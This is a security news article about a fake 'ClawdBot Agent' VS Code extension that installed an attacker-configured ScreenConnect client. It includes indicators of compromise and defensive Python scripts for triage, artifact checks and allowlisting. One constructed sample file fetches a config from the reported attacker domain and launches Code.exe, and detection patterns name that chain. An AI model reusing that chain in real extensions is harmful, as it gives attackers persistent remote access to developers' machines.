VS Code Extension Malware – Fake “ClawdBot Agent”

The VS Code Extension Malware “ClawdBot Agent” disguised itself as an AI coding assistant, fetched a remote configuration when VS Code started, and installed a preconfigured ConnectWise ScreenConnect client. This allowed attackers to establish persistent remote access to Windows systems.

VS Code Extension Malware in the Marketplace: Fake “ClawdBot Agent” installs ScreenConnect

As of: 29 January 2026

Researchers at Aikido Security analyzed a VS Code Extension Malware sample that appeared in the official Visual Studio Code Marketplace under the name “ClawdBot Agent – AI Coding Assistant.” According to their analysis, the extension looked functional on the surface, but in the background it caused a ScreenConnect instance preconfigured for attacker use to be installed on Windows systems and automatically connected to attacker-controlled infrastructure.

The listing was available under the extension ID clawdbot.clawdbot-agent and showed 77 installs at the time of research. Aikido reports that, after notifying Microsoft, the extension was removed quickly; a public Microsoft statement on this specific incident has not been published so far.

Timeline of the VS Code Extension Malware: discovery, reporting, removal

According to Aikido, the extension was flagged by their malware detection on 27 January 2026, then validated and reported to Microsoft (see the Aikido analysis). The context and additional details (including background around Moltbot/Clawdbot) were also covered shortly thereafter by The Hacker News.

How the VS Code Extension Malware works: the infection chain

The VS Code Extension Malware was configured to activate automatically when the IDE starts (via the onStartupFinished activation event). First, it downloads a file called config.json from an external domain; in Aikido’s analysis this is clawdbot.getintwopc[.]site. It then executes a binary named Code.exe.

“Code.exe” is not necessarily “classic” custom malware, but rather a legitimate ScreenConnect client that was preconfigured to connect to attacker infrastructure (Aikido cites meeting.bulletmailer[.]net:8041 as a relay/C2 indicator). This is what makes detection harder: the software itself is legitimate, but the target configuration is malicious.

Aikido also describes fallback mechanisms: among other things, a tampered DLL (DWrite.dll) is used for sideloading so payloads can still be fetched if the primary infrastructure is unavailable—also including retrieval via a Dropbox link. This significantly increases the robustness of the attack.
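The chain described above (startup activation, download of a remote config.json, execution of a bundled .exe, references to the reported indicator domains) can be turned into a local triage check over installed extension folders. The following Python script is an added example, not code from Aikido or from the original article. It assumes the usual VS Code layout of one folder per extension containing a package.json and .js sources; the source-level heuristics and the two sample extensions it constructs are assumptions, and the sample “bad” extension is inert text that only mirrors the described behaviour so the scanner has something to find.

```python
"""Triage installed VS Code extensions for the chain described above (added example)."""
import json
import re
import tempfile
from pathlib import Path

# Extension ID and domains from the Aikido report; domains kept defanged as published.
KNOWN_BAD_IDS = {"clawdbot.clawdbot-agent"}
IOC_HOSTS_DEFANGED = ["clawdbot.getintwopc[.]site", "meeting.bulletmailer[.]net"]


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form that appears in code or logs."""
    return indicator.replace("[.]", ".")


IOC_HOSTS = [refang(h) for h in IOC_HOSTS_DEFANGED]

# Source-level heuristics (assumptions, not signatures from the report): a remote
# config.json download and a handoff to a Windows executable.
REMOTE_CONFIG = re.compile(r"https?://[^\s'\"]*config\.json", re.I)
SPAWN_EXE = re.compile(r"\b(?:spawn|execFile|execSync|exec)\s*\([^)]*\.exe", re.I)


def triage_extension(ext_dir: Path) -> dict:
    """Return the extension ID and a list of findings for one extension folder."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    ext_id = f"{manifest.get('publisher', '')}.{manifest.get('name', '')}".lower()
    findings = []
    if ext_id in KNOWN_BAD_IDS:
        findings.append("known-bad extension id")
    events = manifest.get("activationEvents", [])
    # Startup activation is common in benign extensions; it matters only together
    # with the other findings, so it is recorded rather than treated as a verdict.
    if "onStartupFinished" in events or "*" in events:
        findings.append("activates at IDE startup")
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="ignore")
        findings += [f"references IOC host {h}" for h in IOC_HOSTS if h in text]
        if REMOTE_CONFIG.search(text):
            findings.append("downloads a remote config.json")
        if SPAWN_EXE.search(text):
            findings.append("launches a .exe")
    return {"id": ext_id, "path": str(ext_dir), "findings": findings}


def triage_all(extensions_root: Path) -> list:
    """Triage every folder under the root that carries a package.json."""
    return [triage_extension(d) for d in sorted(extensions_root.iterdir())
            if (d / "package.json").is_file()]


def build_sample_root() -> Path:
    """Constructed sample data: one benign extension and one inert stand-in that
    mirrors the described chain in plain text so the scanner has something to find."""
    root = Path(tempfile.mkdtemp())
    benign = root / "acme.spellcheck-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps(
        {"publisher": "acme", "name": "spellcheck", "activationEvents": ["onLanguage:markdown"]}))
    (benign / "extension.js").write_text("exports.activate = () => console.log('ready');\n")
    bad = root / "clawdbot.clawdbot-agent-1.0.0"
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps(
        {"publisher": "clawdbot", "name": "clawdbot-agent", "activationEvents": ["onStartupFinished"]}))
    (bad / "extension.js").write_text(
        f"fetch('https://{IOC_HOSTS[0]}/config.json');\nexecFile('Code.exe');\n")
    return root


if __name__ == "__main__":
    # Point triage_all at ~/.vscode/extensions (or %USERPROFILE%\.vscode\extensions) for a real run.
    for result in triage_all(build_sample_root()):
        print(result["id"], "->", result["findings"] or "no findings")
```

The individual findings are deliberately weak on their own (many legitimate extensions activate at startup or shell out to a tool); the value is in the combination, which is why the function returns the full list instead of a single verdict.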

Why VS Code Extension Malware using “legitimate tools” is especially dangerous

This case highlights a pattern that frequently complicates incident response: remote admin and RMM tools (such as ScreenConnect) can look “normal” in corporate environments, but are deliberately abused by attackers to establish stealthy remote access. In Aikido’s analysis, this approach is explicitly described as “legitimate remote software, weaponized configuration.”

Checks & immediate actions for VS Code Extension Malware

  • Remove the extension! Search for “ClawdBot Agent”/“clawdbot” in VS Code and uninstall it (details at Aikido).
  • Check for ScreenConnect artifacts! Aikido lists C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)\ as an example path and notes a corresponding Windows service.
  • Check temp staging! Aikido mentions %TEMP%\Lightshot as a storage location—review the folder and contents and remove them.
  • Block/monitor network indicators! Including meeting.bulletmailer[.]net (port 8041) and additional IOCs listed in the analysis.
  • Rotate API keys! If configurations/keys were stored in the extension (e.g., LLM providers), treat them as compromised and replace them.
  • Treat it as an incident! If ScreenConnect inbound/outbound activity is confirmed, don’t just “clean up”—preserve evidence, check for persistence, and rule out lateral movement.
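The checks in the list above can be scripted against exported data instead of being run by hand on each machine. The Python below is an added example, not code from the article or from Aikido. It assumes firewall or proxy logs exported as key=value lines, a file-system inventory as a list of paths and a service inventory as (name, state) pairs; all three sample inputs are constructed inline. The ScreenConnect service-name pattern is an assumption, since the article only states that a corresponding Windows service exists.

```python
"""Host and network artifact checks for the indicators listed above (added example)."""
import re

# Indicators from the Aikido report, stored defanged as published.
IOC_HOSTS_DEFANGED = ["meeting.bulletmailer[.]net", "clawdbot.getintwopc[.]site"]
IOC_RELAY_PORT = "8041"


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


IOC_HOSTS = {refang(h) for h in IOC_HOSTS_DEFANGED}

# The 16-hex-character suffix is instance specific; the report's path is one example.
SCREENCONNECT_DIR = re.compile(r"\\ScreenConnect Client \([0-9a-f]{16}\)(\\|$)", re.I)
LIGHTSHOT_TEMP = re.compile(r"\\Temp\\Lightshot(\\|$)", re.I)
# Assumption: the client's Windows service uses the same "ScreenConnect Client (<id>)" name;
# the report only states that a corresponding service exists.
SCREENCONNECT_SVC = re.compile(r"^ScreenConnect Client \(", re.I)


def parse_kv(line: str) -> dict:
    """Parse a 'key=value key=value' log line (format assumed for this example)."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def check_network(log_lines: list) -> list:
    """Connections to a reported host; the relay port is noted when it matches."""
    hits = []
    for line in log_lines:
        f = parse_kv(line)
        dst = f.get("dst", "").lower()
        if dst in IOC_HOSTS:
            hits.append({"host": f.get("host"), "dst": dst, "dport": f.get("dport"),
                         "relay_port": f.get("dport") == IOC_RELAY_PORT})
    return hits


def check_filesystem(paths: list) -> list:
    """Paths matching the ScreenConnect client folder or the %TEMP%\\Lightshot staging folder."""
    return [p for p in paths if SCREENCONNECT_DIR.search(p) or LIGHTSHOT_TEMP.search(p)]


def check_services(services: list) -> list:
    return [name for name, _state in services if SCREENCONNECT_SVC.match(name)]


def triage_host(log_lines: list, paths: list, services: list) -> dict:
    net, fs, svc = check_network(log_lines), check_filesystem(paths), check_services(services)
    # Confirmed ScreenConnect traffic or a live service means incident handling, not
    # cleanup alone: preserve evidence first, then look for persistence and lateral movement.
    verdict = "incident" if net or svc else ("suspicious" if fs else "clean")
    return {"network": net, "filesystem": fs, "services": svc, "verdict": verdict}


# Constructed sample inputs (not real telemetry).
SAMPLE_LOG = [
    "ts=2026-01-28T09:55:10Z host=DEV-07 dst=update.example.com dport=443 action=allow",
    f"ts=2026-01-28T09:58:42Z host=DEV-07 dst={refang(IOC_HOSTS_DEFANGED[0])} dport=8041 action=allow",
]
SAMPLE_PATHS = [
    r"C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)",
    r"C:\Users\dev\AppData\Local\Temp\Lightshot",
    r"C:\Users\dev\.vscode\extensions\acme.spellcheck-1.0.0",
]
SAMPLE_SERVICES = [("Spooler", "Running"), ("ScreenConnect Client (083e4d30c7ea44f7)", "Running")]

if __name__ == "__main__":
    print(triage_host(SAMPLE_LOG, SAMPLE_PATHS, SAMPLE_SERVICES))
```

Because ScreenConnect is also used legitimately, the file-system match alone only yields “suspicious”; the script escalates to “incident” when the reported relay host shows up in traffic or the client service is actually registered, which mirrors the last item in the list.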

Prevention against VS Code Extension Malware starts with basic hygiene in the developer stack

  • Verify the publisher and provenance – For popular tools, first check official project pages/GitHub to confirm whether a real Marketplace extension exists.
  • Principle of minimality – Install extensions only when truly needed; review permissions/settings regularly.
  • Monitoring & allowlisting – Treat IDE extensions as a supply-chain risk: EDR policies, network egress controls, hash/publisher allowlisting (where possible).
  • Secrets handling – Don’t leave API keys sitting in editor settings; use a secret manager and ensure you can rotate keys.
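Hash/publisher allowlisting from the list above, as an added example that is not the article’s or any project’s code: a policy with allowed publishers and per-extension content digests pinned at approval time, evaluated over an extensions directory so that both an unapproved publisher and a silent change to an approved extension’s files are reported. The policy values, the digest scheme and the sample extensions are constructed for the demonstration.

```python
"""Publisher allowlist plus content pinning for an extensions directory (added example)."""
import hashlib
import json
import tempfile
from pathlib import Path

# Constructed policy: publishers allowed to install, and per-extension content digests
# recorded at approval time (empty until pin() is called).
POLICY = {"allowed_publishers": {"acme", "ms-python"}, "pinned": {}}


def folder_digest(ext_dir: Path) -> str:
    """SHA-256 over sorted relative paths and file bytes; any edit or added file changes it."""
    h = hashlib.sha256()
    for f in sorted(p for p in ext_dir.rglob("*") if p.is_file()):
        h.update(f.relative_to(ext_dir).as_posix().encode() + b"\0")
        h.update(f.read_bytes() + b"\0")
    return h.hexdigest()


def extension_id(ext_dir: Path) -> str:
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    return f"{manifest.get('publisher', '')}.{manifest.get('name', '')}".lower()


def evaluate(extensions_root: Path, policy: dict) -> dict:
    """Classify each installed extension as ok, or record why it violates policy."""
    ok, violations = [], []
    for d in sorted(p for p in extensions_root.iterdir() if (p / "package.json").is_file()):
        ext_id = extension_id(d)
        publisher = ext_id.split(".", 1)[0]
        digest = folder_digest(d)
        if publisher not in policy["allowed_publishers"]:
            violations.append((ext_id, "publisher not allowlisted"))
        elif ext_id in policy["pinned"] and policy["pinned"][ext_id] != digest:
            violations.append((ext_id, "contents differ from pinned digest"))
        else:
            ok.append((ext_id, digest))
    return {"ok": ok, "violations": violations}


def pin(extensions_root: Path, policy: dict) -> None:
    """Record the current digest of every compliant extension as its approved state."""
    for ext_id, digest in evaluate(extensions_root, policy)["ok"]:
        policy["pinned"][ext_id] = digest


def build_sample_root() -> Path:
    """Constructed sample: an allowlisted extension and one from an unknown publisher."""
    root = Path(tempfile.mkdtemp())
    for folder, publisher, name in [("acme.spellcheck-1.0.0", "acme", "spellcheck"),
                                    ("clawdbot.clawdbot-agent-1.0.0", "clawdbot", "clawdbot-agent")]:
        (root / folder).mkdir()
        (root / folder / "package.json").write_text(json.dumps({"publisher": publisher, "name": name}))
        (root / folder / "extension.js").write_text("exports.activate = () => {};\n")
    return root


def demo() -> dict:
    """First inventory, pin the compliant set, then simulate a silent content change."""
    root = build_sample_root()
    policy = {"allowed_publishers": set(POLICY["allowed_publishers"]), "pinned": {}}
    first = evaluate(root, policy)
    pin(root, policy)
    (root / "acme.spellcheck-1.0.0" / "extension.js").write_text("exports.activate = () => fetch('x');\n")
    return {"first": first, "after_change": evaluate(root, policy)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Pinning the digest rather than only the publisher is what catches the case this article describes from the other side: an extension that was acceptable when approved but whose contents later change through an update or tampering.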

FAQ on VS Code Extension Malware

In effect, yes (remote access). Technically, however, it is often best categorized as abuse of a legitimate remote admin/RMM tool. In the “ClawdBot Agent” case, ScreenConnect is central (see Aikido).

At the time of research, the Marketplace listing showed 77 installs (Marketplace page). This should not be confused with separate campaigns in which media reported much higher install counts for other AI extensions.

AI extensions currently meet high demand and are easy to install. The World Economic Forum also describes AI as the dominant driver of change and highlights AI-related vulnerabilities as a fast-growing risk (see WEF Global Cybersecurity Outlook 2026).

Category: News